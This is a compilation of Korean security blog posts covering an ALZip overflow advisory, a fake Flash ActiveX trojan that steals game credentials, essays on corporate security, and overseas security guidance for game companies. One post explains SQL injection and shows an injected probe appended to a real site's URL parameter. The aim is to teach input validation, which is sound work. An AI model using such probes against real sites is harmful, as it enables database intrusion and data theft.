PROVIDED AND/OR DISCOVERED BY:
David Herselman

ORIGINAL ADVISORY:
Debian:
http://www.debian.org/security/2005/dsa-844

 

=========================================================================================
TITLE:
ALZip Multiple Archive Handling Buffer Overflow

SECUNIA ADVISORY ID:
SA16847

VERIFY ADVISORY:
http://secunia.com/advisories/16847/

CRITICAL:
Moderately critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
ALZip 6.x
http://secunia.com/product/5669/
ALZip 5.x
http://secunia.com/product/5668/

DESCRIPTION:
Secunia Research has discovered a vulnerability in ALZip, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to multiple boundary errors when reading the filename of a compressed file
from ALZ, ARJ, ZIP, UUE, or XXE archives. This can be exploited to cause a stack-based buffer overflow (ALZ), or a heap-based buffer overflow (ARJ / ZIP / UUE / XXE).

Successful exploitation allows execution of arbitrary code when a malicious ALZ / ARJ archive is opened, or when a ZIP / UUE / XXE archive is extracted.

The vulnerability has been confirmed in the following versions:
* ALZip v6.12 (Korean)
* ALZip v6.1 (International)
* ALZip v5.52 (English)

Prior versions may also be affected.

SOLUTION:
Update to version 6.13 (Korean and International).


 

Posted by 바다란

 

새로운 방식의 공격기법이 발견이 되었습니다. 따라서 주의가 필요합니다.

해당 백도어는 국내사이트를 해킹 한 이후 국내사이트에 Flash.ocx 파일을 올립니다. 그리고 해당 ocx가 위치된 링크를 또 다른 국내 사이트 ( 유명 사이트 )를 해킹 한 후 iframe 등을 이용하여 실행이 되도록 만들어져 있습니다. 기존 패치와는 관계 없는 새로운 기법이므로 많은 피해가 예상 되며 빠르게 변형들이 출현 할 것으로 예상 됩니다.  웹서버의 취약성으로 인해 악성코드 실행 명령이 추가된 웹페이지를 방문할 경우 ocx 파일 설치가 진행이 되게 되죠. 대부분의 일반 유저는 Flash 라는 이름만을 보고 설치를 진행할 것으로 보입니다.

 

OCX 파일 설치시에  보안 경고 창이 활성화 되고 여기에서 사용자를 속일 수 있는 Microsoft Flash 8.0 이라는 프로그램명으로 설치가 되도록 되어 있습니다.

해당 OCX 설치시에는 프로그램에 explorer.exe 파일이 시스템 디렉토리에 설치 되며

특정 온라인 게임 이용시에 사용자 정보를 획득 하도록 되어 있습니다.

 

지난 주 까지는 몇 달 동안 계속 되어온 05-001 패치 넘버와 관련된 .chm 파일 실행시의 임의의 명령실행이 되는 버그를 이용하여 정보 유출 시도를 끊임 없이 했는데 패치가 설정된 개인 PC가 증가함에 따라 .chm 파일의 실행 버그를 통한 정보 유출이 계속 줄어 들게 되고 따라서 공격하는 크래커 그룹들이 다른 유형으로 변형을 한 것으로 보입니다.

앞으로도 이와 같은 시도가 많이 발생할 것으로 보이고 해당 내용은 타 바이러스 및 백도어 유포시에도 동일하게 사용이 될 수 있으므로 주의가 필요합니다.

 

특정 사이트를 방문하였을때 보안 경고창이 활성화 될 경우 주의깊게 보셔야 할 것 같습니다.

공격하는 쪽의 기술 발전 속도가 빠르게 높아 지고 있어서 우려가 됩니다. 

 

 

* 해킹이나 크래킹에서의 사회공학이란 의미는 속인다는 의미와 유사하다고 보시면 됩니다.

===================================================================================

 

  

 

 

[마이데일리 = 은정 기자] 기존의 인터넷 익스플로러 취약점 유포방식과 달리 액티브 엑스(Active X) 방식을 사용하여 '플래쉬 8.0 프로그램'으로 위장, 사용자 컴퓨터에 국내 온라인 게임 사용자의 아이디와 암호 유출을 시도하는 트로이 목마가 발견돼 주의가 요망된다.

 

백신업체 ㈜지오트의 바이러스 분석실(GCERT)은 기존 인터넷 익스플로러의 보안 취약점을 악용한 방식이 더 이상 효과를 보지 못할 것으로 예측한 해커들이 새로운 유포 방식을 만들고 있다고 말했다.

 

해킹된 두 곳의 국내 사이트들을 확인한 결과 '플래쉬 8.0 프로그램'으로 위장한 보안경고창이 나오게 되며, 사용자가 동의할 경우 윈도우 폴더에 트로이목마가 설치되게 된다.

 

사용자가 해킹된 사이트에 접속했을 때 마치 정상적인 플래쉬 관련 액티브 엑스 컨트롤로 위장하여 사용자가 직접 설치하도록 유도하고 있는 것이 변경된 해킹 수법의 특징이다.

 

''버튼을 누르면 윈도우 폴더의 Downloaded Program Files 폴더에 설치가 되며 감염이 되면 윈도우 폴더에 'explore.exe(52,736 바이트)' 파일이 숨김속성으로 생성된다. 이 트로이목마는 국내 온라인 게임사용자의 아이디와 암호 등을 유출시키고자 시도하는 악성프로그램이다.

 

지오트는 긴급히 해당 사이트 보안 담당자에게 메일로 내용을 전달했으며, 한국정보보호진흥원(KISA) 인터넷침해사고대응지원센터 해킹대응팀에게도 제공한 상태이다.

 

지오트 바이러스 분석실(GCERT)문종현 실장은 “시간이 지날수록 해킹 방법이 지능적이고 기발하게 변화되고 있다”며 “잘 모르는 사이트를 방문할때나 자주 방문하는 사이트더라도 팝업창 등은 자세히 살펴보고, 백신의 실시간 감시 기능을 항상 켜놓아야 한다”고 말했다.

 

[액티브 엑스로 위장, 트로이목마 설치하는 새로운 수법이 나타났다.]

 

(박은정 기자 pej1121@mydaily.co.kr)

 

 

Posted by 바다란

 

안녕하세요 바다란입니다.

 

 

금일자 해킹/바이러스 뉴스를 보다보니 다음과 같은 의미 있는 수치가 발견이 되었습니다.

그동안 막연하게 해킹을 당할 경우 이미지 손실이나 매출액에 부정적인 영향을 미친다고만 알고 있었는데  본격적인 수치로 측정이 된 사례는 이번이 처음인 것 같습니다.

 

해킹 및 크래킹으로 인한 피해 대비 보안 투자 비용은 언제나 고민 스러운 부분이지만 현재 상황에서 IT 기업의 연속성을 유지 하기 위해서는 필수비용이라고 판단이 됩니다. 관련된 소식은 해당 기사를 참조 하시면 될 것 같습니다.

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=030&article_id=0000131518&section_id=105&section_id2=283&menu_id=105

 

기사에서 언급하듯이 기업의 이미지는 25% 하락하고 매출액에도 12% 이상 영향을 미치는 것으로 발표가 되었습니다.

발표주체는 CONCERT ( Consortium of CERT ) 이며 국내 기업들에 존재하는  침해사고 대응팀의 협의체 입니다.

 

침해사고 대응팀이라는 것이 명목상으로 존재하는 곳들도 있지만 실제 국내 대기업 및 주요 기업들은 다 포함이 되어 있으며 해당 이슈에  미루어  짐작을 해볼때  중요한 의미를 파악 할 수 있습니다.

 

특히 IT 자산을 기반으로 하는  회사의 경우 기사에서 언급된 내용 보다 더욱 심할 것으로 예상이 됩니다. 매출액에 영향을 주는 점은 순간적이나 장기적으로 브랜드 이미지의 하락의 만회는 상당한 시일이 걸린다는 점에서 더욱 중점을 두어야 될 것 같습니다.

 

 

보안의 실행 부분에 대해서

 

예전 부터 보안은 보험이다 라는 이야기를 많이들 했었습니다.

그러나 이제는 바뀌게 되었죠. 보안은 성장을 위한 필수요소로....

 

국내의 많은 기업들 특히 IT 기반의 기업들의 대부분은 침해사고에 대한 사실을 공개하지 않고 있습니다. 그만큼 영향력이 있다는 반증이기도 합니다.  최근 침해 사고를 보게되면 한번 침입 발생 이후  원인제거가 아닌 현상의 제거를 통해 ( 단순히 웹소스의 부분 수정 이나 악성코드의 제거 ) 문제 해결을 하려는 시도를 많이 봐왔습니다. 또 이런 기업들은 어김없이 추가 침입을 당한 사례도 많이 있습니다.

 

개발 프로세스의 문제 혹은 외주 개발사의 문제 등등 발생 될 수 있는 문제는 많고  명확하게  처리 할 수 있는 인력은 없고...

 

지금도 그러하고 앞으로도 그럴 것으로 생각이 되지만  명확한 현상에 대한 처리 및 추가 대응책. 문제의 원인을 짚어서 그 원인을 원천적으로 제거하고 사전 예방이 되도록 만드는 많은 행위는 기존의 구성원들과 많은 대화 및 구성원들의 도움이 없이는 되지 않습니다.

 

국내에도 많은 보안업체들이 있습니다. 전문 서비스를 받는 것도 일시적으로 효과를 볼 수 있습니다. 그러나 적합한 대책 및 이슈에 대한 리딩은 한계가 있을 수 밖에 없습니다.  단기적인 비용을 투자해 순간적인 효과를 볼 수 있으나 깊이 있는 대응 및 리딩을 위해서는 여력이 되는 기업에 한해 보안  조직 구성은 필수의 시대인 것 같습니다. 다른 기업들에게도 많은 부담외 되겠죠

 

브랜드 가치의 하락 및 매출에 직접적인 영향을 줄 수 있다는 점. 이제는 보안이라는 이슈가  보조가 아닌 주된 역량을 기울여야만 되는 영역이라는 점을 알 수 있게 해주는 수치 인 것 같습니다.

 

Posted by 바다란

KISA에서 제작하는 온라인 게임 해킹 대응 가이드에 실린 글입니다.

 

 

해외진출 시의 보안상 주의 사례 :

 

2000년도 이후부터 우리의 온라인 게임들은 해외에 다수 진출 하였다. 현지 퍼블리싱 업체와 손을 잡고 합작 진출을 한 경우와 직접 진출을 한 경우를 볼 수 있다. 대표적인 해외 진출 국가는 중국/일본/미국을 들 수 있으며 국가는 계속 확대 되는 추세이다. 저작권 법이나 불법 운용에 대한 부정적인 인식이 떨어지는 중국의 경우에는 해외 진출 업체가 지난 몇 년간 곤혹스런 경험을 한 적이 다수 있는 상황이다.

 

예를 들어 현지 업체와 계약을 맺고 상용화 단계에 까지 성공을 하였는데도 입금이 되지 않거나 현지 업체가 고객의 결재 내역을 공개하지 않아 정확한 수치를 확인 하기도 힘든 상황을 맞이 하기도 한 상황이 있고 대금 지급과 관련된 분쟁으로 오랜 기간 동안 힘든 싸움을 했던 경우도 있다.

 

섣부른 로컬라이징 서버의 제공으로 인해 권리 주장도 하지 못한 채 Free 서버 및 독자적인 현지 업체의 상용화로 곤란을 겪은 사례도 있어서 주의가 요구된다.

 

일반적으로 해외 진출 시의 검토 단계는 다음과 같이 이루어 진다.

 

사전 조사 -> 진행 -> 계약 -> 계약 이후의 이행 단계

 

사전조사 단계에서는 시장성에 대한 조사 및 현지 업체에 대한 정보 수집 등이 이루어 지며 면밀한 조사가 필요한 부분이다. 각 게임 개발사들에서 실적을 우선적으로 진행 하다 보면 사전 조사 단계에서의 정보 수집 부족으로 난항을 겪을 수 있다.

 

진행:

현지인 Agent 및 퍼블리셔 들과의 미팅을 통해 신뢰할 만한 파트너 관계를 찾는 과정이다. 서비스에 대한 명확한 이해를 하고 있으며 신뢰할 만한 파트너 인지 여부를 확인 하는 과정이 필요하며 상호간의 서비스 진행에 대한 협조 관계가 성립 할 수 있는지 여부를 검토하고 신중하게 진행을 해야 한다.

직접 진출의 경우에는 현지 국가에 대한 법령 및 체제에 대한 이해 및 법인 설립시의 Risk 요인을 검토하고 종합적으로 판단을 내릴 수 있어야 한다.

 

계약:

간접 진출의 경우 계약 단계에서 고려해야 할 사안들이 많다. WTO 가입 이후에도 저작권에 대한 인식이 약한 중국의 경우에는 국내 게임 업체들의 피해 사례도 다수 있는 상태라 여러 부분에서 주의를 기울여야 하는 부분이다. 계약의 당사자가 신뢰할 만한 당사자인지 또는 과거에 피해를 당한 업체가 있는지를 체크하는 것이 필요하며 피해의 원인 분석 및 원인에 따른 대응 단계를 계약 단계에서 명확하게 문서화 하는 것이 필요하다.

 

계약 이후의 이행단계:

명확하게 대금 지급 과정 및 경로에 대해서 계약단계에서 명확하게 기술 하는 것이 필요하며 해당 내용에 따라 이행하는 단계로서 문제에 대한 해결 [ Hacking 이나 Abusing에 대한 대응] 조건 및 소스코드에 대한 관리 및 서버 운용에 대한 책임등을 명확하게 한 후 이행하는 과정을 검토하는 것이 필요하다.

 

일반적으로 사전조사 , 진행 , 계약 , 이행의 단계로 볼 수 있는데 여러 가지 위험요소가 있을 수 있으나 여기에서는 보안 관련된 측면만 살펴 보기로 하자. 해외 진출 시의 주의 사항은 보안적인 측면에서 살펴보면 다음과 같은 면을 살필 수 있다.

 

위험:

1.       소스코드의 유출

2.       Free 서버 운용 [ 서버 시스템의 관리 및 통제 ]

3.       물리적인 서버의 보안

4.       service에 대한 해킹을 통한 정보 유출 및 권한 획득

5.       게임 서비스에 대한 장애 [ 운용상의 미숙 혹은 외부로부터의 DoS 공격]

6.       게임내의 아이템 등에 대한 내부 유출 문제

 

위험 요소는 크게 6가지 정도로 볼 수 있다. 각 항목에 대해 계약 단계 혹은 이행 단계에서 지켜지고 준수할 수 있도록 명확한 명문화된 규정이 필요하며 언급이 있어야 향후 문제 발생시에도 원활한 대응이 가능할 것이다.

 

1.소스코드의 유출

해외 서비스 제공 시에는 소스코드의 유출은 가급적 하지 않아야 하며 컴파일된 형태의 서버 버전 및 클라이언트 버전 제공이 필요하다. 협력사의 현지화 요구로 인해 제출해야 할 경우에는 핵심적인 부분을 제외한 나머지 부분에 대해서 협력을 하여야 하며 핵심 부분의 경우에는 본사에서 직접 처리 하거나 인력을 통해 처리 하여야만 한다. 소스코드의 관리는 접근제어 및 권한에 따른 분명한 접근이 가능하여야 한다. 암호화된 매개체에 저장이 되어야 하며 외부 유출 시에도 암호화 되어 보호가 가능하여야 한다.

 

2.Free 서버 운용

게임서버의 이미지 유출 및 도난 으로 인하여 Free 서버가 운용될 경우에는 현지 업체와의 계약 단계에서 해당 문제에 대한 언급이 있어야 한다. 동시접속자의 감소로 인한 피해를 현지 업체의 문제가 아닌 경우로 판단하고 책임을 미루는 경우가 있으므로 Free 서버 운용에 대해서는 현지 업체에서의 모니터링 및 대응에 대한 책임이 있음을 분명히 하고 책임감을 지닐 수 있도록 하여야 한다. 지속적인 단속의 경우도 해외 진출국에서만 가능한 부분이므로 진출사의 입장에서는 어려운 부분들이 있을 수 밖에 없다.

 

3.물리적인 서버의 보안

대부분 IDC에 서버가 위치하게 되는데 물리적인 접근 제어 및 권한 통제가 분명하지 않은 IDC가 국가에 따라 있으며 IDC라는 용어 자체가 규격화 되지 않은 곳들이 있다. 또한 지방에서 운영되는 영세 IDC의 경우에는 물리적인 보안 요소를 갖추지 못하고 있으므로 서버의 운영 시에는 물리적인 보안 수준을 준수하는 IDC를 직접 확인 한 이후 본사 차원에서 모니터링 하는 것이 필요하다. 웹캠 혹은 추가 비용을 들여서라도 접근을 통제 하는 것이 필요하며 개발사 자체에서 운영을 하는 것이 필요하다. 영세 업체의 경우에는 현지 퍼블리싱 업체와의 계약 단계에서 명문화 하는 것이 필요하며 IDC에 대한 접근 통제 수준을 확인 하는 것이 반드시 필요하다.  서버 자체에도 고유 Mac Address 등을 인식하여 중앙 본사 차원에 접근을 하여야 실행이 되도록 하는 고유 기술을 두어 중앙 통제가 가능하여야만 한다. 최소한 서버의 외부 유출 시에도 정상적인 서비스가 실행 될 수 없도록 하는 보안 장치는 염두에 두어야만 한다.

 

4.service에 대한 해킹을 통한 정보 유출 및 권한 획득

웹 서비스에 대한 수정이나 이벤트 진행 시에 보안상 취약한 부분이 있을 경우 서비스에 대한 해킹이 발생 할 수 있다. 권한 획득도 가능한 취약성들이 다수 있으므로 Database 및 사용자 정보가 보관된 곳은 외부 노출 시에도 문제가 발생하지 않도록 암호화 하여 보관하는 것이 필수적이며 평문 보관의 경우 치명적인 피해를 입을 수 있다. 피해 발생 시에는 피해에 대한 원인 파악에 따라 보상하는 것이 일반적이므로 해당 규정을 명문화 하는 것도 필요한 사안이다.

 

5.게임 서비스에 대한 장애 [ 운용상의 미숙 혹은 외부로부터의 DoS 공격]

운용상의 미숙 및 외부로 부터의 공격에 대해 현지 업체가 원활한 대응을 하지 못하여 서비스 장애가 발생 하였을 경우 개발사의 품질을 의심하는 사례가 다수 있으므로 문제 발생 시에는 판단하게된 기록의 제공 및 대응 내역을 문서화 하여 공조 하는 것을 검토 하여야 한다. 명확하게 하여야만 피해의 원인 파악 및 보상등에 대해서 논의 하는 것이 가능해 진다.

 

6. 게임내의 아이템 등에 대한 내부 유출 문제

현지 업체의 내부자에 의해 접근이 가능한 Admin Tool의 경우 아이템의 외부 노출등 상당한 위험요소가 존재하므로 신뢰성 있는 직원, 정보보호 교육에 대한 의무화 등에 대해서도 검토를 하는 것이 필요하다. Database에 접근하는 모든 로그들은 삭제할 수 없는 형태로 별도 보관하여 차후에 증빙 할 수 있는 자료로 삼아 보상 및 피해 규모를 산정 할 수 있도록 하는 것이 좋으며 초기 서비스 설비의 설계단계에서부터 최종 정보가 위치하는 Database에 대한 접근 기록에 대해서는 별도 관리가 필요하므로 고려 하여야만 한다.  접근 가능자에 대한 축소 및 주기적인 Auditing도 필요한 부분이며 문제 발생시에는 현지 퍼블리싱 업체가 전적인 책임을 질 수 있도록 명문화 하는 과정도 고려 하여야 한다.

 

 

이상과 같이 해외 진출 시 고려 부분들에 대해서 보안이라는 측면에서 간략하게 알아 보았다. 표준적인 내용은 아니며 다수 발생한 사례들을 기준으로 하여 해당 문제들이 발생하지 않기 위해서는 어떤 점을 고민해야 하고 대안으로 무엇이 있을 수 있는지를 간략하게 알아 보았다. 문제가 발생하는 상황은 많으며 계약의 조건도 다를 수 있다. 그러나 기본적으로 발생하는 6가지 형태의 문제들에 대해서 대책을 가지고 해외 진출을 하게 된다면 보안상 발생하는 문제들에 대해서는 일정 수준 이상의 해결 능력을 지니게 될 것이다.

 

written by p4ssion

Posted by 바다란


프리토리의 오류?

 

한국의 보안 점수는 5~6점이라고 말한 것은 zone-h 에 리스트 되는 다수의 사이트들을 보고 내린 결론입니다. 최근 해킹 되는 국내 사이트를 보면 소액의 금액으로 호스팅 서비스를 해주는 호스팅 서버가 주로 해킹을 당합니다. 호스팅 서버 한 곳 마다 최소 몇 십개에서 몇 백개 가량의 사이트를 서비스 해주고 있습니다. 또 저렴한 비용으로 하다보니 APM 을 선호하죠. 대부분 리눅스 머신에 말입니다.

 

APM(Apache + PHP + Mysql) 조합을 사용하는데 최근 발견되는 취약성의 대부분은 PHP 관련된 Injection 및 외부 파일 실행에 관련된 문제들입니다. 또 국내에서 주로 사용하는 zeroboard 및 phpbb 관련된 게시판이 해외에서 부터 분석이 되어져서 취약성이 나오는 관계로 서버 권한 획득이 매우 쉬운 상태입니다.

 

계속 문제가 발생할 수 밖에 없고 모든 운영자가 보안의 전문가 일 수가 없으므로 당연히 많은 문제가 있습니다. 버전 관리 부터 일상적인 운영에 이르기 까지 문제가 있고 수시로 발생하는 문제들에 대해서 모니터링 하는 인력도 거의 없는 형편입니다.

 

하루에도 몇 천통씩 날라오는 버그트랙이나 취약성 관련된 메일을 모니터링 할 수 있는 사람이 얼마나 될까요?.. 의문입니다.

 

Internet business 가 활성화 되다 보니 우후죽순으로 호스팅 업체가 생겨 났고 기본적인 솔루션 설치만 가능하면 다들 전문가 입니다. 해외 그 어느 곳보다도 저렴한 비용으로 웹 서비스를 운용하는 기업 및 개인 , 사업체가 많습니다. 저렴한 비용에 걸맞는 낮은 보안도 있구요.

 

이런 사이트들을 비교하여 보안 수준을 높이기 위해서는 한국내의 3세대 혹은 4세대 유비쿼터스 망상에서의 수많은 어플리케이션에 대한 검증을 하고 보안성을 높이기 위해서는 전세계의 보안 전문가들 다 끌어 모아도 어려운게 사실 입니다.

 

프리토리가 보는 관점은 서버가 해킹 당하는 비율을 보고 객관적으로 나열하는 것에 지나지 않고 몇년 동안 꾸준히 지켜본 바에 의하면 국내 주요 서버들의 보안성은 대폭으로 신장이 되어 있습니다. 세계 수준에 별로 뒤쳐지지 않습니다.  해킹 당한 곳들도 대부분 보면 영세한 호스팅 업체가 대부분입니다.

지난해 까지만 해도 Apache 및 리눅스 데몬 취약성을 이용해서 해킹을 해서 리스트가 그리 많지 않았으나 지난해 말 부터는 PHP 취약성을 이용해서 대규모로 해킹을 하는 실정입니다. 아마 올 상반기만해도 지난해의 몇배 정도는 되었을 것으로 보입니다.

 

한국의 보안 점수를 정량화 할 수 있느냐 하는 면에 있어서는 좀 의견이 있습니다. 정성적으로 봤을때는 진보 하고 있고 전체적인 수준은 높아지고 있으나 각 분야의 전문가들의 폭이 너무 좁다 보니 ( 또 키우지를 않았죠.. ^^)  몇 몇 전문가들에게 과도한 요구들이 몰리는 경향이 있어서 그나마 있는 인력풀도 흩어지는 경향이 있습니다. 세계적 수준을 요구하면서 대우는 그렇지 못하기도 하지요.

 

무선관련된 이슈 및 피싱 및 개인정보 도용에 관련된 문제는 아직 문제가 많습니다. 또 유비쿼터스 환경의 위협은 이미 3년전에 공개적으로 언급 하였지만 아직도 그리 나아지지는 않았습니다. 전체적인 위협 대응은 나아지고 있으나 전문화된 영역의 대응이 떨어지고 있습니다.

 

세계에서 인증서를 가장 많이 사용하는 나라는 어딜까요?..

PKI 관련 솔루션이 기업환경에 일반화된 나라는 어디 일까요?..

도토리 키재기 이지만 거의 모든 분야의 보안 솔루션을 자체 기술력으로 보유한 나라는 어디 일까요?..

무선 AP가 가장 많이 설치된 도시는 어디 일까요?..

 

프리토리의 오류는 기술의 발전 및 분화를 제대로 보지 못한채 한면 만을 보고 판단한 것에 지나지 않습니다. 그렇다고 우리가 잘하느냐..그것도 아니죠.

 

인력을 키우지 못했고 환경을 조성 하지 못했고 무조건 기술의 발전에만 매달려 앞으로만 달린 후유증은 앞으로 계속 있을 것입니다. 얼마나 그 후유증을 극복하느냐가 중요한 과제인데 과연 어떻게 풀 수 있을까요?.. 무조건적인 기술 적용이 대안은 아닌데도 말입니다.

 

언젠가 말했듯이 분야의 활성화 만이 대안이 될 것이고 보안이나 크래킹이라는 부분이 비즈니스에 치명적인 결과를 초래할 수 있는 부분이여서 충분한 비용을 들여야 한다는 인식이 기업이나 사회 전반에 걸쳐 공감대가 이루어 져야만 합니다. 물론 지금의 비즈니스도 충분히 위험 하구요.

 

편리함이 있으면 그에 따른 위험요소도 있게 마련입니다.

이익이 있으면 그만큼의 위험이 있는 것이 당연 합니다.

 

성장에는 후유증이 따르게 마련이고 지금 우리의 IT 산업 특히 인터넷 관련 분야는 실감할 때 인 것 같습니다. 

 

얼마나 최소화 할 수 있는지가 가장 중요한 관점입니다.

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=008&article_id=0000557191&section_id=105&section_id2=283&menu_id=105

 

'Security Indicator' 카테고리의 다른 글

해커들의 총반격이 시작 되었다 (?)  (0) 2010.04.27
해외진출 시의 보안 가이드  (0) 2010.04.27
한국의 보안 10점 만점에 5점!  (0) 2010.04.27
텔레뱅킹 -해킹  (0) 2010.04.27
진정한 넷보안이란?  (0) 2010.04.27
최악의 기업 보안 사례 5  (0) 2010.04.27
Posted by 바다란

manian쪽에 올린 글인데 예를 들어서 설명 하였으므로 참고할 부분이 있을 것입니다.

도움 되시길.

---------------------------

안녕하세요. 바다란입니다.

다른 사이트들이 기능상의 코딩을 못해서 생기는 문제가 아닙니다.
기능상으로는 최적화 되어 있죠. 작은 부분 하나를 신경 쓰지 못해서 생기는 문제입니다.
동일하게 manian 이 사이트도 똑같이 당합니다.

간단하게 말씀 드려 DB에 직접 인자를 전달하는 웹 코딩에 있어서 이 인자값에 대해 검사를 하지 않으면 DB에 직접 명령을 내릴 수 있습니다.

다들 밑에 게시물 보면 바이러스 제품에 걸리고 안 걸리고 이걸 가지고 언급을 많이 하시는데 이건 차후적인 문제입니다. 어떻게 해서 그 웹 소스에 바이러스 코드가 들어 갈 수 있는지가 가장 중요한 관점이 되어야 하지 않을까요?.

문제는 여기에서 부터 시작합니다.

예를 들어 이 글을 입력하는 URL을 보면 다음과 같습니다.
http://manian.dreamwiz.com/board/write.asp?bid=A010101&page=1&cate=6

Write.asp 라는 웹 소스내에 인자는 bid , page , cate 라는 세개의 인자를 가지고 있습니다.
물론 내부에 더 있을 수 있죠. 이 각각 인자를 가지고 DB에 해당하는 인자를 조합한 값에 일치 되는 결과를 돌려주고 그 결과가 화면상에 나타납니다. 그렇다면 bid 는 문자와 숫자가 조합이 되어 있고 page 와 cate 인자는 숫자가 입력 되도록 되어 있습니다.

만약 위의 인자에 다른 값들이 들어가면 어떻게 될까요? DB에서 인자의 구분은 ' 와 같은 인용부호를 통해 이루어 집니다. Bid=A010101 이라는 값에서 DB로 쿼리하기 전에 코딩상에서 'A010101' 이라는 값을 넣어서 select 쿼리가 들어가게 되겠죠. 이 값의 뒤에 ' 문자를 더 입력하면 어떻게 될까요?. 'A010101'' 입력이 되겠죠. 그러면 DB에서는 ' 인용부호가 닫혀지지 않았다는 에러가 발생하게 됩니다. 여기에서 부터 SQL Injection 공격이 이루어 지는 거죠. ' 문자를 입력하거나 And 문자를 입력하였을때 DB에 저장된 결과를 수십번의 반복 쿼리를 통해 결과값을 얻어 낼 수가 있습니다. 여기에 관련된 공격은 웹에서 SQL Injection 관련 문서를 찾으면 다수 나올 껍니다.

page와 cate에는 숫자만 들어 가야 하는데 이건 프로그래머의 가정이죠. 입력하는 사람이 숫자가 아닌 문자를 입력한다면 어떻게 될까요?. 스크립트 상에서 숫자만 있는지를 검색해야 하는데 안할 경우에는 DB로 바로 전달이 됩니다.
브라우저 상으로 볼때는 500 Internal Server error 가 발생되어 실행이 안되는 것으로 보이나 Raw Traffic상에는 DB에서 리턴되어 오는 결과가 저장 되어 있습니다.
Ethereal 등으로 트래픽을 보면 확인 할 수 있습니다.

위의 예에서 보듯이 지난 5월 부터 이루어진 국내사이트의 공격에서 가장 중요한 관점은 이겁니다. 인자에 대한 입력 체크 및 Validation 체크가 핵심입니다.
Type에 대한 체크 및 인자의 입력값에 대한 길이 체크 그리고 특수문자 입력에 대한 처리가 가장 중요한 부분입니다.

http://blog.naver.com/p4ssion/40015866029 게시물에 올려진 내용들도 참고 하시면 될 듯 싶네요.

paros 나 web application scanner 등을 이용하여 인자 단위의 유효성 체크와 SQL Injection 취약성 가능성을 체크 하는 것이 가장 중요합니다. 진단 툴의 경우도 만들어서 쓰고 있는 툴의 예를 들면 ScreammingCSS 라는 CSS 진단하는 펄 스크립이 있습니다. 이걸 변경하고 SQL Injection 이나 인자 단위의 입력값 검증을 하는 루틴을 첨가하면 손쉽게 만들 수 있습니다.

입장이 곤란해서 오픈을 못하는 것이 안타까울 따름입니다.

그럼 ...

------------

답변중에서:

 

로긴 창에 SQL Injection을 시도하는건 작년 까지의 버전입니다.
중국쪽에서 인자 각각에 대해 DB가 에러메시지를 보내는 것을 받아서 Blind SQL Injection 기법으로 DB user 및 계정 정보를 획득 합니다.
위에 설명을 잘 보시면 Form이나 로그인 창에 입력하는게 아닙니다.

길이제한이 없을 경우 이 글의 링크인 http://manian.dreamwiz.com/board/view.asp?bid=A060201&no=116895 에다 no가 숫자만이 아닌 문자도 받는다고 했을때 http://manian.dreamwiz.com/board/view.asp?bid=A060201&no=116895' and db_name() .. 등등 이렇게 쿼리를 하면 어떻게 결과가 나올까요?..
아마도 500 Internal Server error가 뜹니다. 그러나 위의 게시물대로 Raw Traffic을 보면 MSSQL의 경우  결과가 전송되는 것을 확인 할 수 있습니다. 즉 브라우저에 보여지는 것과 웹로그에는 500 Error라고 나타나도 DB와 조회는 가능하다는 거죠.

이 관계를 모르기 때문에 문제가 계속 되는겁니다.
분명히 인자에 대한 길이 제한 및 인자 값에 들어가 있는 특수 문자 제어등과 같은 Input validation check가 안되면 계속 됩니다. 예전과 같은 SQL Injection 로그인 기법을 생각하시면 안됩니다.

웹 프로그래머 이시면 이글의 링크를 예를 들어 bid 와 no 에 값으로 받는 것에 대해 숫자인지 아니면 특수문자가 들어가 있는지 일정 길이 이상이 넘는지를 체크하여 DB에 전송 해야 합니다. 이런 체크가 선행 되지 않으면 DB는 거져 먹는게 되죠.

그럼.

 

Posted by 바다란

Terrorists Don't Do Movie Plots


 

http://www.schneier.com 사이트에 가시면 많은 Security 관련된 칼럼 들을 만날 수 있습니다.

브루스 슈나이어는 오래전 부터 익숙한 이름입니다. 암호 부분에 정평이 나있죠. 그러나 한 영역을
고집하지 않고 큰 부분을 보려고 많이 노력한 사람이기도 합니다.
예전 보안 관제 관련 회사에 여러해 동안 근무한 적이 있습니다.
이때에도 슈나이어의  관점과 동일한 컨셉을 가지고 많은 부분을 설계하기도 하였는데
이 글을 읽다보니 사고 방식이나 보는 관점 등에서 동질감을 많이 느끼게 합니다. ^^ 물론 본 적은 없죠..

카운터 페인이라는 회사는 2000년 초기에 설립된 Security Monitoring 관련된 회사 입니다.
미국내 중요 국가 기관들에 대한 IT 보안 이슈를 체크하고 모니터링 해주는 곳이며 전문적인 영역을 지니고 있는 회사입니다.
IT 보안과 물리적 보안은 영역이 매우 다르지만 보는 관점에 따라 동일하게 볼 수도 있습니다.
한 분야의 전문가 영역에서 다른 부분을 비유하여 보는데 아래의 글은 다음과 같이 해석하면
IT 보안 부분에도 동일하게 적용이 됩니다.

테러 -> 해킹 , 크래킹
표적 ( 공항 , 버스 , 지하철  ... ) -> 중요 IT 자산

 

오래전 부터 알고 있던 분야의 전문가가 상당히 관점이 다를 수도 있는 물리적 보안 의 관점에 대해
거시적인  문제를 제기 하고 있는데 이 부분은 IT 부분에도 동일하게 적용이 될 수 있습니다.
테러에 대한 대비책에 있어서 단편적인 대책과 일방향적인 업무처리 , 책임회피를 위한 생색내기 활동등 여러가지 부분들이 상존하는 위협을 없애지 못하는 원인이며 향후에도 지속될 문제라고 지적하는데 일면 타당하다고 보여집니다.
매번 미국의 영화에 단골로 등장하는 스탤론이나 브루스 윌리스는 현실에서는 존재하지 않습니다. 이것이 진정한 현실입니다.


상상과 현실을 혼돈 하지 않는 것에서 모든 것이 출발해야 하죠. 문제의 인식과 원인에 대한 것들 까지도...
미국의 테러에 대한 근본적인 해결은 물론 힘으로 해결하고 자신의 의견을 무력으로라도 관철하려는 의지가 사라지지 않는한 또 주위국가와 함께 가려고 하지 않는 한 해결 되지 않겠지만 IT 보안 부분에 대해서는 많이 다른 관점이 되겠죠.

우리도 이제는 지켜야 할 자산이 매우 많아 졌고 또한 지금까지 여타 회사나 기업체들이 그러하였듯
Security 관련 결정이 단편적이고 매우 낮은 수준에서 이루어 진 것이 현실 입니다.
침입 탐지 시스템을 설치하고 방화벽을 설치하면 보안이 다 되고 웹 관련 방화벽과 스캐너를 구비하면 모든 것이 다 이루어지는 것인양 생각하는 기업들이 많았습니다만 현실은 그렇지 않습니다.

